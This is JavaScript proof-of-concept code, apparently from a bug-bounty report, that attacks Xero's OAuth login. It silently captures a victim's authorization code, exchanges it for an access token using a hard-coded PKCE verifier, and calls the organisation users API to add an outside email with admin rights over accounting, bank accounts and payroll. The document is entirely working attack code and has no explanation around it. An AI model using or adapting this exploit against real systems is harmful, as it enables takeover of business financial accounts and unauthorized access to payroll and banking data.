const window2 = window.open('https://login.xero.com/identity/connect/authorize?client_id=xero_business_go&redirect_uri=https%3A%2F%2Fgo.xero.com%2Foidc%2Fsilent.html&response_type=code&scope=openid%20profile%20email%20xero_frontend-apis%20xero_frontend-platform-apis&code_challenge=SMdhjMTMY46uPVb59lq8ezrfrgzQIuTW-1n5W-pPfNA&code_challenge_method=S256&prompt=none&response_mode=fragment'); function checkForRedirectBack() { try { if (window2 && !window2.closed) { const currentHref = window2.location.href; // Check if it's returned to our origin if (window2.location.origin === window.location.origin) { console.log('Returned to our site:', currentHref); // Parse code from query string var orgId = JSON.parse(document.getElementById('header-data').textContent.substring(21, 125) + "}").organisationId const urlParams = new URLSearchParams(window2.location.hash.substring(1)); const code = urlParams.get('code'); clearInterval(pollTimer); window2.close(); var tokenRequest = new XMLHttpRequest(); tokenRequest.open("POST", "https://identity.xero.com/connect/token", true); tokenRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); tokenRequest.onreadystatechange = function () { if (tokenRequest.readyState === XMLHttpRequest.DONE) { if (tokenRequest.status === 200) { try { var jsonResponse = JSON.parse(tokenRequest.responseText); var accessToken = jsonResponse.access_token; console.log("Access Token:", accessToken); // Step 2: Send POST request using the access token var apiRequest = new XMLHttpRequest(); apiRequest.open("POST", `https://go.xero.com/api/user-settings/organisations/${orgId}/users`, true); apiRequest.setRequestHeader("Authorization", "Bearer " + accessToken); apiRequest.setRequestHeader("Content-Type", "application/json"); apiRequest.onreadystatechange = function () { if (apiRequest.readyState === XMLHttpRequest.DONE) { if (apiRequest.status === 200 || apiRequest.status === 201) { console.log("API Response:", apiRequest.responseText); } else { console.error("API Request Failed:", apiRequest.status, apiRequest.responseText); } } }; var data = { messageBody: "Hello ATTACKER", user: { email: "refaat1@bugcrowdninja.com", firstName: "user", lastName: "X" }, accounting: { hasBankAccountAdmin: true, hasManageUsers: true, isEnabled: true, role: "ACCOUNTING_ROLE_ADVISOR" }, expenses: { isEnabled: false }, payroll: { isAdmin: true, isEmployee: false }, projects: { isEnabled: true, role: "PROJECTS_ADMIN" } }; apiRequest.send(JSON.stringify(data)); } catch (e) { console.error("Error parsing token response:", e); } } else { console.error("Token request failed:", tokenRequest.status, tokenRequest.responseText); } } }; // URL-encoded body for token request var tokenBody = `client_id=xero_business_go&code=${code}&redirect_uri=https%3A%2F%2Fgo.xero.com%2Foidc%2Fsilent.html&code_verifier=_PAd7JdtOsjE5zvvVkEHwOOyMBRoE9vYZaFNLFVdkAXn3XzKnnJYw74ohMFGM3fSXf1U2NA8O6pYgpwvsXodLg&grant_type=authorization_code`; tokenRequest.send(tokenBody); } } else { clearInterval(pollTimer); } } catch (err) { } } const pollTimer = setInterval(checkForRedirectBack, 1000);